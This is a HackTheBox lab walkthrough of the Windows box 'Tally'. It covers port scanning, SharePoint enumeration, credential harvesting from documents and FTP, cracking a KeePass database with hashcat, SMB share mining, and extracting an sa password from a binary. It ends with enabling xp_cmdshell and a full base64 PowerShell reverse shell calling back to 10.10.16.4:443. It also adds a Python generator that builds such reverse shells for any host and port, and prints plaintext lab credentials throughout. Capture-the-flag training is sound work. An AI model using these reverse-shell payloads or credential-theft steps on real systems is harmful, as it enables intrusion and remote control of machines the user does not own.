Tally HTB

IP

10.10.10.59

Nmap initial scan

sudo nmap -sV -sC -A -oA nmap/inital_nmap 10.10.10.59

full Nmap scan

nmap -sV -p- -oA nmap/full_scan 10.10.10.59
  • While we wait for the full scan to complete, let's start enumerating what the initial scan has already found

Nmap initial results

sudo nmap -sV -sC -A -oA nmap/inital_nmap 10.10.10.59
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 04:21 EDT
Nmap scan report for 10.10.10.59
Host is up (0.036s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
81/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp  open  ccproxy-http?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.10.59:1433: 
|     Target_Name: TALLY
|     NetBIOS_Domain_Name: TALLY
|     NetBIOS_Computer_Name: TALLY
|     DNS_Domain_Name: TALLY
|     DNS_Computer_Name: TALLY
|_    Product_Version: 10.0.14393
|_ssl-date: 2023-08-15T08:21:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-15T08:17:32
|_Not valid after:  2053-08-15T08:17:32
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=8/15%OT=21%CT=1%CU=30638%PV=Y%DS=2%DC=T%G=Y%TM=64DB359
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:A)SEQ(SP=106%GCD=3%ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M53ANW8ST11%O
OS:2=M53ANW8ST11%O3=M53ANW8NNT11%O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)
OS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=
OS:2000%O=M53ANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-08-15T08:21:37
|_  start_date: 2023-08-15T08:17:13

TRACEROUTE (using port 23/tcp)
HOP RTT      ADDRESS
1   50.12 ms 10.10.16.1
2   24.24 ms 10.10.10.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.82 seconds

Ports

21: FTP

  • Microsoft ftpd; anonymous login disabled

80: HTTP

  • IIS 10.0; the main page is a Microsoft SharePoint site (note the redirect to /_layouts/15/start.aspx)

81: HTTP

  • Microsoft HTTPAPI 2.0 (http.sys); the root answers "Bad Request - Invalid Hostname", so it expects a specific Host header we don't know yet

135: RPC

139: netbios-ssn

445: SMB

  • anonymous/null-session login is disabled; the host scripts also show SMB signing enabled but not required

808: unidentified (Nmap guesses ccproxy-http)

  • on a Windows/SharePoint host this is usually the .NET Net.Tcp Port Sharing Service; nothing for us here yet

1433: ms-sql-s Microsoft SQL Server 2016 RTM (13.00.1601.00), no post-RTM patches

  • the NTLM info leaks the hostname TALLY (domain and computer name are identical, so the box is not domain-joined) and the OS build 10.0.14393, which is Windows Server 2016, not the 2008 R2 - 2012 range Nmap guessed from SMB

Port 80 HTTP

When first landing on the web server we can see that the application is Microsoft SharePoint.

Not much we can do on this page without credentials, but it's worth noting what the URL bar shows:

http://10.10.10.59/_layouts/15/start.aspx#/default.aspx

Take note of the /_layouts/15/start.aspx part of that URL

  • /_layouts : a standard SharePoint virtual directory for system-level pages and functionality; it is served for every site, so it's a good place to look for pages exposed regardless of what the site owner published

  • /15 : the SharePoint "hive" version folder; 15 is the SharePoint 2013 hive (SharePoint 2016 keeps serving /_layouts/15 as well for compatibility, so this alone doesn't pin the version)

  • /start.aspx : the Minimal Download Strategy entry page; the page actually being shown is the part after the #, which the browser never sends to the server

With this knowledge, a sensible next step is to directory-bust from http://10.10.10.59/_layouts/15 with a SharePoint-specific wordlist (seclists)

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/sharepoint-ennumeration.txt -u http://10.10.10.59/_layouts/15 -o dirs_2.txt

Within the results we find

http://10.10.10.59/_layouts/15/viewlsts.aspx

This is the Site Contents page, which lists every list and library on the site, including ones not linked from the home page. Clicking into Documents we can see a Word file, ftp-details, last modified by tally\administrator.

Let's download it to our local host and view the contents. LibreOffice can open the Word document:

libreoffice ftp-details.docx

Inside the document we find a password:

UTDRSCH53c"$6hys

We don't have a username for it yet, though, so let's go back to

http://10.10.10.59/_layouts/15/viewlsts.aspx

and view the Site Pages library.

When you click on Site Pages you are sent back to the home page. To reach the actual library, strip the /_layouts/15/start.aspx# prefix from the link (the same wrapper we saw in the home URL; everything after the # is a fragment the browser never sends to the server)

so our URL should consist of the following

http://10.10.10.59/SitePages/Forms/AllPages.aspx

The redirect happens because SharePoint's Minimal Download Strategy loads pages inside start.aspx and keeps the real path in the URL fragment to speed up navigation for normal users; for us, requesting the underlying .aspx directly bypasses that wrapper and works fine.

Within Site Pages we can see a FinanceTeam page.

Opening /SitePages/FinanceTeam.aspx we find some juicy information.

From what we can gather we have found the users

Rahul
Sarah
Tim
ftp_user

The message on that page refers to the FTP account, so we can safely pair the password from ftp-details.docx with ftp_user

ftp_user: UTDRSCH53c"$6hys

FTP

Log in over FTP with those credentials (the password contains a double quote and a dollar sign; type it literally at the prompt)

ftp ftp_user@10.10.10.59

Looking within the User directory we can see a number of users

Administrator
Ekta
Jess
Paul
Rahul
Sarah
Stuart
Tim
Yenwi

Let's mirror the FTP server onto our local machine using wget (the single quotes stop the shell from interpreting the " and $ in the password)

wget -r 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'

In

/10.10.10.59/User/Sarah

we find notes.txt, which contains the following

done

install Sharepoint, replace Orchard CMS

to do

uninstall SQL Server 2016
  • so Orchard CMS was replaced with SharePoint, and the SQL Server 2016 instance Orchard used is still installed (which matches port 1433 being open); anything Orchard left behind that references that database is worth a look

Under /10.10.10.59/Intranet/Binaries

we can see a Firefox installer

'Firefox Setup 44.0.2.exe'

Running searchsploit against that version shows it has known exploits

  • we will keep this in our back pocket; it only matters if a user on the box actually runs that Firefox, so it's a possible privilege-escalation lead rather than a way in

If we also look in

/10.10.10.59/User/Tim/Files

we find tim.kdbx, a KeePass database that could well contain passwords.

Opening the database prompts for the master password.

What we can do is use keepass2john to turn the database header into a crackable hash and hashcat to crack it

  1. use keepass2john (its output is prefixed with the file name as a "username", which is why --user is needed below)

keepass2john tim.kdbx > /home/kali/Desktop/OSCP_MACHINES/windows/tally/tim.kdbx.hash

  2. crack the hash with hashcat (mode 13400 is KeePass 1/2)

hashcat -m 13400 tim.kdbx.hash --user /usr/share/wordlists/rockyou.txt

  3. we now have the master password

simplementeyo

Now we can open the KeePass database (for example with keepassxc)

Looking through the database we find credentials for an SMB share

TALLY ACCT share: Finance: Acc0unting
 

SMB

Let's view what shares are present and what access Finance has to them

smbmap -u Finance -p Acc0unting -H 10.10.10.59

We have READ access to the ACCT share. Let's mount it and enumerate the contents

sudo mount -t cifs -o user=Finance,pass=Acc0unting //10.10.10.59/ACCT /mnt
cd /mnt

Listing every file on the share turns up a lot of junk

find . -type f

We saw earlier in the Nmap scan that Microsoft SQL Server 2016 is running, so let's refine the search around that

find . | grep SQL

Among the results is a conn-info.txt containing a set of credentials

old server details

db: sa
pass: YE%TJC%&HYbe5Nw

have changed for tally
  • these are old sa credentials; the note itself says they were changed for Tally, so they're not useful on their own

Let's look for txt files and see if anything else comes up

  • also, recall from Sarah's notes that Orchard is no longer on the system, so anything under the Orchard directories is unlikely to reflect the live setup

find . -type f | grep txt | grep -v Orchard
  • nothing too interesting

Let's look for executables

find . -type f | grep exe | grep -v Orchard

Among the executables on the share, tester.exe doesn't sound like an ordinary application, so let's look at its strings

strings tester.exe > tester_output.txt
vi tester_output.txt

Within the output one line stands out: a connection string for the SQL server. The sa password differs from the one in conn-info.txt, and the database name ties it to the old Orchard install

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
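Plain strings only extracts ASCII runs, and Windows and .NET binaries often keep literals as UTF-16LE (strings -e l finds those). The following Python is an added example, not code from the write-up or the box: it pulls both kinds of string out of a binary and parses ODBC/ADO.NET style connection strings for credential fields. The sample bytes are constructed inline so it runs offline; they are not tester.exe. Run it as python find_connstr.py tester.exe to use a real file.

```python
import re
import sys

# Constructed sample of what a compiled binary might contain. NOT tester.exe
# from the ACCT share; built inline so the script runs offline. The first
# connection string is plain ASCII, the second is UTF-16LE (char, NUL, char, NUL),
# which plain `strings` would miss.
ASCII_BLOB = (
    b"MZ\x90\x00\x03junk\x00"
    b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;"
    b"UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;"
    b"\x00\xff\xfe"
)
UTF16_BLOB = "Data Source=dbhost;User ID=app;Password=Hunter2!;".encode("utf-16-le")
SAMPLE = ASCII_BLOB + b"\x01\x02" + UTF16_BLOB + b"\x00"

MIN_LEN = 8  # GNU strings defaults to 4; 8 cuts most of the noise


def ascii_strings(data: bytes, min_len: int = MIN_LEN):
    """Runs of printable ASCII, the same thing `strings` prints."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, data)]


def utf16le_strings(data: bytes, min_len: int = MIN_LEN):
    """Runs of printable ASCII stored as UTF-16LE, the same thing `strings -e l` prints."""
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pat, data)]


# Keys worth pulling out of ODBC / ADO.NET style connection strings.
CONN_KEY_RE = re.compile(
    r"\b(PWD|Password|UID|User ID|SERVER|Data Source|DATABASE|Initial Catalog)\s*=\s*([^;]+)",
    re.IGNORECASE,
)


def find_connection_strings(data: bytes):
    """Return every extracted string that carries a password field, with its fields parsed."""
    hits = []
    for s in ascii_strings(data) + utf16le_strings(data):
        fields = {k.lower(): v.strip() for k, v in CONN_KEY_RE.findall(s)}
        if "pwd" in fields or "password" in fields:
            hits.append({"raw": s, "fields": fields})
    return hits


if __name__ == "__main__":
    # Usage: python find_connstr.py <binary>   (falls back to the built-in sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for hit in find_connection_strings(data):
        print(hit["raw"])
        for k, v in hit["fields"].items():
            print("  %-16s %s" % (k, v))
```

On the constructed sample both strings are reported; on a real binary the UTF-16LE pass is the one that usually matters for .NET code.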

Shell as sarah via MSSQL

We can use mssqlclient.py (part of impacket) with the sa credentials from the connection string (the # and @ in the password are fine unquoted here; impacket splits the target on the last @)

mssqlclient.py sa:GWE3V65#6KFH93@4GWTG2G@10.10.10.59

Typing help shows that we can run OS commands through xp_cmdshell.

It is disabled by default, so first we need to enable it. The enable_xp_cmdshell helper runs sp_configure for 'show advanced options' and 'xp_cmdshell' followed by RECONFIGURE, which requires sysadmin; sa has that.

enable_xp_cmdshell
xp_cmdshell whoami

whoami comes back as tally\sarah, so the SQL Server service runs under Sarah's account and anything we spawn from it inherits that. Running dir through xp_cmdshell shows the working directory is system32.

Let's establish a reverse shell on the system. We will use a PowerShell one-liner from https://www.revshells.com/ in its base64 form, so there are no quoting problems passing it through xp_cmdshell and cmd.exe

  1. the PowerShell reverse shell, base64 (UTF-16LE) encoded for -e; decoded, it calls back to 10.10.16.4 on port 443

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
  2. start a netcat listener on the same port

rlwrap -cAr nc -lvnp 443

  3. run the PowerShell command through xp_cmdshell

The listener catches the connection and we now have a shell as Sarah.
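Before running an encoded one-liner taken from a generator, decode it and confirm it calls back to your own listener. The following Python is an added example, not part of the write-up: it encodes a script the way powershell -e expects (UTF-16LE, then base64), decodes one back, and extracts the callback host and port. The template is the standard TCP reverse shell one-liner of the kind revshells.com emits, parameterised on LHOST/LPORT; the 180-character PAGE_PREFIX is copied from the payload above and used to check that the encoder reproduces it.

```python
import base64
import re

def encode_powershell(script: str) -> str:
    """Base64 form expected by powershell.exe -EncodedCommand / -e: UTF-16LE, no BOM."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell; read a payload before you run it."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Standard TCP reverse shell one-liner (same shape as the revshells.com PowerShell
# base64 payload), parameterised on listener host and port. Braces are doubled
# because the string goes through str.format().
REVSHELL_TEMPLATE = (
    '$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});'
    '$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};'
    'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;'
    '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
    '$sendback = (iex $data 2>&1 | Out-String );'
    '$sendback2 = $sendback + "PS " + (pwd).Path + "> ";'
    '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);'
    '$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
)

def build_revshell(lhost: str, lport: int) -> str:
    """Plain-text reverse shell for the given listener."""
    return REVSHELL_TEMPLATE.format(lhost=lhost, lport=lport)

TARGET_RE = re.compile(r'TCPClient\("([^"]+)",\s*(\d+)\)')

def extract_target(encoded: str):
    """(host, port) that a base64 payload will connect back to, or None if it is not a TCPClient shell."""
    m = TARGET_RE.search(decode_powershell(encoded))
    return (m.group(1), int(m.group(2))) if m else None

# First 180 base64 characters of the payload used in this write-up (copied from the page);
# 180 characters is exactly 135 bytes, so it compares cleanly with a fresh encoding.
PAGE_PREFIX = (
    "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5"
    "AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwA"
    "aQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAiACwANAA0ADMAKQA7"
)

if __name__ == "__main__":
    enc = encode_powershell(build_revshell("10.10.16.4", 443))
    print("matches write-up payload prefix:", enc[:180] == PAGE_PREFIX)
    print("calls back to:", extract_target(enc))
    print("xp_cmdshell powershell -e " + enc)
```

The last printed line is what goes into the mssqlclient.py prompt; change the host and port in build_revshell to match your own listener and re-run.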
